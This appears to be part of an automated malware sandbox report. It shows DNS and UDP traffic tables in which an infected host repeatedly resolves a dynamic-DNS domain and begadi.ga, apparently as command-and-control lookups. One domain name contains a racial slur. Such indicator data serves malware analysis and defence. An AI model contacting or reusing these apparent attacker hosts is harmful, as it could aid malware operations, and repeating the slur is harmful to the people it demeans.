                Dec 21, 2020 08:34:58.287416935 CET53505198.8.8.8192.168.2.22
                Dec 21, 2020 08:34:58.711656094 CET5418753192.168.2.228.8.8.8
                Dec 21, 2020 08:34:58.736073017 CET53541878.8.8.8192.168.2.22
                Dec 21, 2020 08:34:59.157669067 CET5867353192.168.2.228.8.8.8
                Dec 21, 2020 08:34:59.182039022 CET53586738.8.8.8192.168.2.22
                Dec 21, 2020 08:34:59.615947008 CET6377953192.168.2.228.8.8.8
                Dec 21, 2020 08:34:59.643393993 CET53637798.8.8.8192.168.2.22
                Dec 21, 2020 08:35:00.071464062 CET5624053192.168.2.228.8.8.8
                Dec 21, 2020 08:35:00.095675945 CET53562408.8.8.8192.168.2.22
                Dec 21, 2020 08:35:00.519056082 CET6091553192.168.2.228.8.8.8
                Dec 21, 2020 08:35:00.546318054 CET53609158.8.8.8192.168.2.22
                Dec 21, 2020 08:35:00.951364994 CET4917753192.168.2.228.8.8.8
                Dec 21, 2020 08:35:00.984199047 CET53491778.8.8.8192.168.2.22
                Dec 21, 2020 08:35:01.390788078 CET5203753192.168.2.228.8.8.8
                Dec 21, 2020 08:35:01.415328979 CET53520378.8.8.8192.168.2.22
                Dec 21, 2020 08:35:01.849296093 CET5941153192.168.2.228.8.8.8
                Dec 21, 2020 08:35:01.873703957 CET53594118.8.8.8192.168.2.22
                Dec 21, 2020 08:35:02.301299095 CET5703353192.168.2.228.8.8.8
                Dec 21, 2020 08:35:02.325675964 CET53570338.8.8.8192.168.2.22
                Dec 21, 2020 08:35:02.741864920 CET6084353192.168.2.228.8.8.8
                Dec 21, 2020 08:35:02.766237974 CET53608438.8.8.8192.168.2.22

                DNS Queries

                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                Dec 21, 2020 08:33:20.079046011 CET192.168.2.228.8.8.80x211bStandard query (0)chnesstdyqudusisabadassniggainthestfmv.ydns.euA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:20.141686916 CET192.168.2.228.8.8.80x211bStandard query (0)chnesstdyqudusisabadassniggainthestfmv.ydns.euA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:31.913495064 CET192.168.2.228.8.8.80x3397Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:32.661679029 CET192.168.2.228.8.8.80x6b88Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:33.384108067 CET192.168.2.228.8.8.80x5ac2Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:33.879810095 CET192.168.2.228.8.8.80xff39Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:34.362772942 CET192.168.2.228.8.8.80x5fb6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:34.881009102 CET192.168.2.228.8.8.80x1b02Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:35.359441996 CET192.168.2.228.8.8.80x4a26Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:35.837912083 CET192.168.2.228.8.8.80xd57aStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:36.313498974 CET192.168.2.228.8.8.80xf5d6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:36.808887959 CET192.168.2.228.8.8.80x37e8Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:37.314598083 CET192.168.2.228.8.8.80x2690Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:37.787421942 CET192.168.2.228.8.8.80xdaa4Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:38.269783974 CET192.168.2.228.8.8.80x2801Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:38.743330002 CET192.168.2.228.8.8.80x5d56Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:39.221379995 CET192.168.2.228.8.8.80x41dbStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:39.711550951 CET192.168.2.228.8.8.80x4455Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:40.202322006 CET192.168.2.228.8.8.80xced7Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:40.652861118 CET192.168.2.228.8.8.80xaaeStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:41.115207911 CET192.168.2.228.8.8.80xf263Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:41.607522011 CET192.168.2.228.8.8.80xf523Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:42.085715055 CET192.168.2.228.8.8.80xb44cStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:42.570028067 CET192.168.2.228.8.8.80x1bf6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:43.024233103 CET192.168.2.228.8.8.80x3407Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:43.507846117 CET192.168.2.228.8.8.80xd35bStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:43.990227938 CET192.168.2.228.8.8.80xa48Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:44.476102114 CET192.168.2.228.8.8.80xbac1Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:44.947941065 CET192.168.2.228.8.8.80x6328Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:45.426358938 CET192.168.2.228.8.8.80x5df6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:45.893923044 CET192.168.2.228.8.8.80xaa4aStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:46.404953957 CET192.168.2.228.8.8.80xa122Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:46.857896090 CET192.168.2.228.8.8.80xb6ffStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:47.341500998 CET192.168.2.228.8.8.80x3dd8Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:47.811341047 CET192.168.2.228.8.8.80xc326Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:48.293976068 CET192.168.2.228.8.8.80xfbaaStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:48.764221907 CET192.168.2.228.8.8.80x9447Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:49.248095989 CET192.168.2.228.8.8.80x1f33Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:49.738286972 CET192.168.2.228.8.8.80xc5a6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:50.200308084 CET192.168.2.228.8.8.80xcac4Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:50.703052044 CET192.168.2.228.8.8.80xb096Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:51.166956902 CET192.168.2.228.8.8.80xb47eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:51.634434938 CET192.168.2.228.8.8.80x5bf1Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:52.106240034 CET192.168.2.228.8.8.80xed4eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:52.575071096 CET192.168.2.228.8.8.80x5d81Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:53.053771019 CET192.168.2.228.8.8.80x4d15Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:53.521665096 CET192.168.2.228.8.8.80xb247Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:54.004151106 CET192.168.2.228.8.8.80xd551Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:54.463464975 CET192.168.2.228.8.8.80xaef1Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:54.918165922 CET192.168.2.228.8.8.80x2f5bStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:55.372256041 CET192.168.2.228.8.8.80x8fd0Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:57.806827068 CET192.168.2.228.8.8.80xef23Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:58.565279007 CET192.168.2.228.8.8.80x476bStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:59.039273977 CET192.168.2.228.8.8.80xc2e9Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:59.513793945 CET192.168.2.228.8.8.80x7013Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:33:59.963618994 CET192.168.2.228.8.8.80x68ecStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:00.431229115 CET192.168.2.228.8.8.80xd32fStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:00.894161940 CET192.168.2.228.8.8.80xf721Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:01.345640898 CET192.168.2.228.8.8.80x9374Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:01.786082029 CET192.168.2.228.8.8.80x8596Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:02.207808971 CET192.168.2.228.8.8.80x3e26Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:02.980644941 CET192.168.2.228.8.8.80x6e6dStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:03.739376068 CET192.168.2.228.8.8.80xe7ffStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:04.201909065 CET192.168.2.228.8.8.80x95e8Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:04.632169008 CET192.168.2.228.8.8.80xe5b1Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:05.084239006 CET192.168.2.228.8.8.80x9f2dStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:05.539611101 CET192.168.2.228.8.8.80x5352Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:05.976373911 CET192.168.2.228.8.8.80x4f0fStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:06.425539017 CET192.168.2.228.8.8.80x7d0eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:06.876219988 CET192.168.2.228.8.8.80x42b0Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:07.333338022 CET192.168.2.228.8.8.80xbedcStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:07.783689976 CET192.168.2.228.8.8.80x8b5Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:08.236664057 CET192.168.2.228.8.8.80x4597Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:08.676565886 CET192.168.2.228.8.8.80x11aStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:09.131469011 CET192.168.2.228.8.8.80x433fStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:09.589118958 CET192.168.2.228.8.8.80x2e22Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:10.046735048 CET192.168.2.228.8.8.80xeeaaStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:10.515592098 CET192.168.2.228.8.8.80x9098Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:10.950223923 CET192.168.2.228.8.8.80x1efcStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:11.411515951 CET192.168.2.228.8.8.80x1ef9Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:11.841891050 CET192.168.2.228.8.8.80x6af1Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:12.305572033 CET192.168.2.228.8.8.80xcadStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:12.768889904 CET192.168.2.228.8.8.80xe282Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:13.222127914 CET192.168.2.228.8.8.80x4e37Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:14.232207060 CET192.168.2.228.8.8.80x4e37Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:15.630001068 CET192.168.2.228.8.8.80xc5Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:16.071230888 CET192.168.2.228.8.8.80x99b5Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:16.519520044 CET192.168.2.228.8.8.80x7dc1Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:16.966084957 CET192.168.2.228.8.8.80x11f3Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:17.457360983 CET192.168.2.228.8.8.80x2e47Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:17.911499977 CET192.168.2.228.8.8.80xdf58Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:18.360188007 CET192.168.2.228.8.8.80xd0e6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:18.821360111 CET192.168.2.228.8.8.80x36eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:19.271018028 CET192.168.2.228.8.8.80xcf0Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:19.715977907 CET192.168.2.228.8.8.80x8499Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:20.170018911 CET192.168.2.228.8.8.80xdcb2Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:20.615250111 CET192.168.2.228.8.8.80xfd1cStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:21.069551945 CET192.168.2.228.8.8.80xbbf9Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:21.521275997 CET192.168.2.228.8.8.80xf9d0Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:21.957238913 CET192.168.2.228.8.8.80x5928Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:22.409060955 CET192.168.2.228.8.8.80xcf51Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:22.841989040 CET192.168.2.228.8.8.80x3c9bStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:23.283040047 CET192.168.2.228.8.8.80xb87Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:23.741769075 CET192.168.2.228.8.8.80x80c6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:24.340230942 CET192.168.2.228.8.8.80x734bStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:24.808307886 CET192.168.2.228.8.8.80x1864Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:25.262887001 CET192.168.2.228.8.8.80x6fa5Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:25.710551977 CET192.168.2.228.8.8.80xb236Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:26.160768032 CET192.168.2.228.8.8.80x694bStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:26.614681959 CET192.168.2.228.8.8.80xb0efStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:27.062807083 CET192.168.2.228.8.8.80xb38Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:27.520749092 CET192.168.2.228.8.8.80xd747Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:27.986989021 CET192.168.2.228.8.8.80x77b8Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:28.446234941 CET192.168.2.228.8.8.80x617cStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:28.886102915 CET192.168.2.228.8.8.80x202Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:29.338663101 CET192.168.2.228.8.8.80x7c63Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:29.768058062 CET192.168.2.228.8.8.80x5ee0Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:30.464324951 CET192.168.2.228.8.8.80xa6f6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:31.077270031 CET192.168.2.228.8.8.80x1ba9Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:31.530584097 CET192.168.2.228.8.8.80xe63eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:31.997639894 CET192.168.2.228.8.8.80x888eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:32.732549906 CET192.168.2.228.8.8.80x65ddStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:33.196446896 CET192.168.2.228.8.8.80x64faStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:33.646843910 CET192.168.2.228.8.8.80x5a90Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:34.237993002 CET192.168.2.228.8.8.80x4033Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:34.832995892 CET192.168.2.228.8.8.80xfe2dStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:35.595055103 CET192.168.2.228.8.8.80x4ad4Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:36.298094034 CET192.168.2.228.8.8.80xfcbfStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:36.745827913 CET192.168.2.228.8.8.80xf28fStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:37.184614897 CET192.168.2.228.8.8.80x6d7eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:37.667687893 CET192.168.2.228.8.8.80x2da4Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:38.116018057 CET192.168.2.228.8.8.80xf6c3Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:38.580862999 CET192.168.2.228.8.8.80xf948Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:39.014872074 CET192.168.2.228.8.8.80x5ed7Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:39.460103035 CET192.168.2.228.8.8.80x19fStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:39.922630072 CET192.168.2.228.8.8.80x6bdcStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:40.387022018 CET192.168.2.228.8.8.80xed92Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:40.870759010 CET192.168.2.228.8.8.80x6d8fStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:41.326885939 CET192.168.2.228.8.8.80x4c89Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:41.787194967 CET192.168.2.228.8.8.80x7dc6Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:42.230077028 CET192.168.2.228.8.8.80xc3b2Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:42.685045958 CET192.168.2.228.8.8.80x84feStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:43.125950098 CET192.168.2.228.8.8.80x5b58Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:43.560400009 CET192.168.2.228.8.8.80xb6a4Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:44.009450912 CET192.168.2.228.8.8.80x34bcStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:44.446667910 CET192.168.2.228.8.8.80xc12dStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:44.919285059 CET192.168.2.228.8.8.80x5ed5Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:45.405236959 CET192.168.2.228.8.8.80x9a94Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:45.873823881 CET192.168.2.228.8.8.80xd4e0Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:46.292246103 CET192.168.2.228.8.8.80x14b7Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:46.737219095 CET192.168.2.228.8.8.80x5e2cStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:47.190372944 CET192.168.2.228.8.8.80xe624Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:47.621474028 CET192.168.2.228.8.8.80x4e4eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:48.633337975 CET192.168.2.228.8.8.80x4e4eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:49.651582956 CET192.168.2.228.8.8.80x4e4eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:50.100256920 CET192.168.2.228.8.8.80xedc0Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:50.556056976 CET192.168.2.228.8.8.80xeb9Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:51.002749920 CET192.168.2.228.8.8.80xbbebStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:51.549300909 CET192.168.2.228.8.8.80x5348Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:51.980609894 CET192.168.2.228.8.8.80xfc79Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:53.237574100 CET192.168.2.228.8.8.80x78a1Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:53.671439886 CET192.168.2.228.8.8.80x18c2Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:54.125663996 CET192.168.2.228.8.8.80xb8aaStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:54.601530075 CET192.168.2.228.8.8.80x65b7Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:55.073710918 CET192.168.2.228.8.8.80x7104Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:55.533246040 CET192.168.2.228.8.8.80x8aa4Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:55.991848946 CET192.168.2.228.8.8.80xd2edStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:56.432776928 CET192.168.2.228.8.8.80xa776Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:56.894483089 CET192.168.2.228.8.8.80x747aStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:57.346008062 CET192.168.2.228.8.8.80x1554Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:57.803312063 CET192.168.2.228.8.8.80x980bStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:58.262943029 CET192.168.2.228.8.8.80xda8eStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:58.711656094 CET192.168.2.228.8.8.80xe33fStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:59.157669067 CET192.168.2.228.8.8.80xc079Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:34:59.615947008 CET192.168.2.228.8.8.80x6088Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:35:00.071464062 CET192.168.2.228.8.8.80x99bdStandard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:35:00.519056082 CET192.168.2.228.8.8.80xf6c8Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:35:00.951364994 CET192.168.2.228.8.8.80x49c8Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:35:01.390788078 CET192.168.2.228.8.8.80x2265Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:35:01.849296093 CET192.168.2.228.8.8.80xbb03Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:35:02.301299095 CET192.168.2.228.8.8.80x59f4Standard query (0)begadi.gaA (IP address)IN (0x0001)
                Dec 21, 2020 08:35:02.741864920 CET192.168.2.228.8.8.80xaa23Standard query (0)begadi.gaA (IP address)IN (0x0001)

                DNS Answers

                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                Dec 21, 2020 08:33:20.141259909 CET8.8.8.8192.168.2.220x211bNo error (0)chnesstdyqudusisabadassniggainthestfmv.ydns.eu103.141.138.119A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:20.181081057 CET8.8.8.8192.168.2.220x211bNo error (0)chnesstdyqudusisabadassniggainthestfmv.ydns.eu103.141.138.119A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:32.245913982 CET8.8.8.8192.168.2.220x3397No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:33.027492046 CET8.8.8.8192.168.2.220x6b88No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:33.416837931 CET8.8.8.8192.168.2.220x5ac2No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:33.912573099 CET8.8.8.8192.168.2.220xff39No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:34.397540092 CET8.8.8.8192.168.2.220x5fb6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:34.913418055 CET8.8.8.8192.168.2.220x1b02No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:35.392252922 CET8.8.8.8192.168.2.220x4a26No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:35.873585939 CET8.8.8.8192.168.2.220xd57aNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:36.346338034 CET8.8.8.8192.168.2.220xf5d6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:36.841499090 CET8.8.8.8192.168.2.220x37e8No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:37.347301960 CET8.8.8.8192.168.2.220x2690No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:37.822774887 CET8.8.8.8192.168.2.220xdaa4No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:38.302434921 CET8.8.8.8192.168.2.220x2801No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:38.776042938 CET8.8.8.8192.168.2.220x5d56No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:39.253777027 CET8.8.8.8192.168.2.220x41dbNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:39.744498014 CET8.8.8.8192.168.2.220x4455No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:40.229345083 CET8.8.8.8192.168.2.220xced7No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:40.677072048 CET8.8.8.8192.168.2.220xaaeNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:41.149358988 CET8.8.8.8192.168.2.220xf263No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
